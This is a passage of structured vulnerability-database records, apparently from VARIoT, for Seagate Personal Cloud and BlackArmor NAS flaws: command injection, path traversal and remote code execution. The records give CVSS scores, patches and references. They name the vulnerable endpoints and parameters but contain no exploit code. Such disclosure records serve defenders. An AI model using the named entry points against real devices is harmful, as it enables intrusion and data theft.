            "db": "VULHUB",
            "id": "VHN-135378"
          }
        ],
        "trust": 1.2999999999999998
      },
      "iot_taxonomy": {
        "_id": null,
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-04347"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:52:13.364000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Personal Cloud",
            "trust": 0.8,
            "url": "https://www.seagate.com/jp/ja/consumer/backup/personal-cloud/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001653"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-77",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-135378"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001653"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-5347"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 3.2,
            "url": "https://blogs.securiteam.com/index.php/archives/3548"
          },
          {
            "trust": 2.5,
            "url": "https://www.exploit-db.com/exploits/43659/"
          },
          {
            "trust": 0.9,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5347"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5347"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/78.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-04347"
          },
          {
            "db": "VULHUB",
            "id": "VHN-135378"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-5347"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001653"
          },
          {
            "db": "PACKETSTORM",
            "id": "145932"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-562"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-5347"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-04347",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-135378",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-5347",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001653",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "145932",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-562",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2018-5347",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2018-03-06T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-04347",
            "ident": null
          },
          {
            "date": "2018-01-12T00:00:00",
            "db": "VULHUB",
            "id": "VHN-135378",
            "ident": null
          },
          {
            "date": "2018-01-12T00:00:00",
            "db": "VULMON",
            "id": "CVE-2018-5347",
            "ident": null
          },
          {
            "date": "2018-02-28T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-001653",
            "ident": null
          },
          {
            "date": "2018-01-16T18:02:22",
            "db": "PACKETSTORM",
            "id": "145932",
            "ident": null
          },
          {
            "date": "2018-01-16T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201801-562",
            "ident": null
          },
          {
            "date": "2018-01-12T01:29:00.200000",
            "db": "NVD",
            "id": "CVE-2018-5347",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2018-03-06T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-04347",
            "ident": null
          },
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-135378",
            "ident": null
          },
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULMON",
            "id": "CVE-2018-5347",
            "ident": null
          },
          {
            "date": "2018-02-28T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-001653",
            "ident": null
          },
          {
            "date": "2019-10-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201801-562",
            "ident": null
          },
          {
            "date": "2024-11-21T04:08:37.910000",
            "db": "NVD",
            "id": "CVE-2018-5347",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-562"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "Seagate Personal Cloud Seagate Media Server Command Injection Vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-04347"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-562"
          }
        ],
        "trust": 1.2
      },
      "type": {
        "_id": null,
        "data": "operating system command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-562"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201804-0530

    Vulnerability from variot - Updated: 2024-11-23 22:26

    Seagate Media Server in Seagate Personal Cloud before 4.3.18.4 has directory traversal in getPhotoPlaylistPhotos.psp via a parameter named url. SeagateMediaServer is one of the media servers. SeagatePersonalCloud 4.3.1. An attacker could exploit this vulnerability to retrieve sensitive information from the NAS using the 'url' parameter.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201804-0530",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "personal cloud",
            "scope": "lt",
            "trust": 1.8,
            "vendor": "seagate",
            "version": "4.3.18.4"
          },
          {
            "model": "technology seagate personal cloud",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "seagate",
            "version": "4.3.18.4"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09564"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004529"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-18263"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:seagate:personal_cloud_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004529"
          }
        ]
      },
      "cve": "CVE-2017-18263",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2017-18263",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-09564",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2017-18263",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-18263",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-18263",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-09564",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201805-069",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09564"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004529"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201805-069"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-18263"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate Media Server in Seagate Personal Cloud before 4.3.18.4 has directory traversal in getPhotoPlaylistPhotos.psp via a parameter named url. SeagateMediaServer is one of the media servers. SeagatePersonalCloud 4.3.1. An attacker could exploit this vulnerability to retrieve sensitive information from the NAS using the \u0027url\u0027 parameter",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-18263"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004529"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-09564"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "PACKETSTORM",
            "id": "147274",
            "trust": 3.0
          },
          {
            "db": "NVD",
            "id": "CVE-2017-18263",
            "trust": 3.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004529",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-09564",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201805-069",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09564"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004529"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201805-069"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-18263"
          }
        ]
      },
      "id": "VAR-201804-0530",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09564"
          }
        ],
        "trust": 1.18333333
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09564"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:26:25.388000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Personal Cloud",
            "trust": 0.8,
            "url": "https://www.seagate.com/jp/ja/support/network-attached-storage/home-network/personal-cloud/"
          },
          {
            "title": "SeagatePersonalCloudSeagateMediaServer path traversal vulnerability patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/129159"
          },
          {
            "title": "Seagate Personal Cloud Seagate Media Server Repair measures for path traversal vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79807"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09564"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004529"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201805-069"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-22",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004529"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-18263"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.0,
            "url": "https://packetstormsecurity.com/files/147274/seagate-media-server-path-traversal.html"
          },
          {
            "trust": 1.6,
            "url": "https://sumofpwn.nl/advisory/2017/seagate-media-server-path-traversal-vulnerability.html"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18263"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18263"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09564"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004529"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201805-069"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-18263"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09564"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004529"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201805-069"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-18263"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-05-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-09564"
          },
          {
            "date": "2018-06-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-004529"
          },
          {
            "date": "2018-05-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201805-069"
          },
          {
            "date": "2018-04-28T01:29:01.453000",
            "db": "NVD",
            "id": "CVE-2017-18263"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-05-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-09564"
          },
          {
            "date": "2018-06-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-004529"
          },
          {
            "date": "2018-05-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201805-069"
          },
          {
            "date": "2024-11-21T03:19:43",
            "db": "NVD",
            "id": "CVE-2017-18263"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201805-069"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate Personal Cloud Seagate Media Server Path Traversal Vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09564"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201805-069"
          }
        ],
        "trust": 1.2
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "path traversal",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201805-069"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201802-0135

    Vulnerability from variot - Updated: 2024-11-23 22:07

    Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. Seagate BlackArmor NAS contains an input validation vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The Seagate BlackArmor NAS is a network storage server from Seagate, Inc. that provides layered protection, incremental data and system backup, recovery, and more for business-critical data. There is a security hole in Seagate BlackArmor NAS. A security flaw exists in Seagate BlackArmor NAS.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201802-0135",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "blackarmor nas 220",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "blackarmor nas 110",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "blackarmor nas 110",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "blackarmor nas 220",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "technology llc blackarmor nas",
            "scope": null,
            "trust": 0.6,
            "vendor": "seagate",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-05856"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008529"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-608"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-3206"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:seagate:blackarmor_nas_110_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:seagate:blackarmor_nas_220_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008529"
          }
        ]
      },
      "cve": "CVE-2014-3206",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2014-3206",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-05856",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-71145",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2014-3206",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2014-3206",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2014-3206",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-05856",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201802-608",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-71145",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2014-3206",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-05856"
          },
          {
            "db": "VULHUB",
            "id": "VHN-71145"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-3206"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008529"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-608"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-3206"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. Seagate BlackArmor NAS Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The SeagateBlackArmorNAS is a network storage server from Seagate, Inc. that provides layered protection, data incremental and system backup, recovery, and more for business-critical data. There is a security hole in SeagateBlackArmorNAS. A security flaw exists in Seagate BlackArmor NAS",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-3206"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008529"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-05856"
          },
          {
            "db": "VULHUB",
            "id": "VHN-71145"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-3206"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2014-3206",
            "trust": 3.2
          },
          {
            "db": "EXPLOIT-DB",
            "id": "33159",
            "trust": 3.2
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008529",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-608",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-05856",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-71145",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-3206",
            "trust": 0.1
          }
        ],
